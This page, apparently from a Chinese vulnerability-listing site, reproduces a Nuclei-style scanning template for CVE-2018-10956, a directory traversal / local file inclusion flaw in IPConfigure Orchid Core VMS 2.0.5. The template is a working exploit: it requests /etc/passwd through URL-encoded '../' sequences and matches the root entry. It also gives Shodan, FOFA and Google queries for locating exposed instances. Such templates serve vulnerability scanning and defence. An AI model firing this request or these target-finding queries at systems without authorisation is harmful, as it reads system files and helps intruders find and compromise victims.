CVE-2018-10956: IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion

日期: 2025-08-01 | 影响软件: IPConfigure Orchid Core VMS 2.0.5 | POC: 已公开

漏洞描述

IPConfigure Orchid Core VMS 2.0.5 is susceptible to local file inclusion.

PoC代码[已公开]

id: CVE-2018-10956

info:
  name: IPConfigure Orchid Core VMS 2.0.5 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: |
    IPConfigure Orchid Core VMS 2.0.5 is susceptible to local file inclusion.
  impact: |
    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information, potentially leading to further compromise of the system.
  remediation: |
    Update to the latest version of IPConfigure Orchid Core VMS to mitigate the LFI vulnerability.
  reference:
    - https://labs.nettitude.com/blog/cve-2018-10956-unauthenticated-privileged-directory-traversal-in-ipconfigure-orchid-core-vms/
    - https://github.com/nettitude/metasploit-modules/blob/master/orchid_core_vms_directory_traversal.rb
    - https://www.exploit-db.com/exploits/44916/
    - https://nvd.nist.gov/vuln/detail/CVE-2018-10956
    - https://github.com/xbl3/awesome-cve-poc_qazbnm456
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2018-10956
    cwe-id: CWE-22
    epss-score: 0.92823
    epss-percentile: 0.99751
    cpe: cpe:2.3:a:ipconfigure:orchid_core_vms:2.0.5:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: ipconfigure
    product: orchid_core_vms
    shodan-query:
      - http.title:"Orchid Core VMS"
      - http.title:"orchid core vms"
    fofa-query: title="orchid core vms"
    google-query: intitle:"orchid core vms"
  tags: cve2018,cve,orchid,vms,lfi,edb,ipconfigure,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100b4fd4f9bbee5c2be55b38078ef981cea012e292fd9a2dce2a7673c73fcb0d3b5022100b8139b28a77b8a547bb5613be16d01e67969e1e19ad79f991fb2f5cfa7447034:922c64590222798bb761d5b6d8e72950

相关漏洞推荐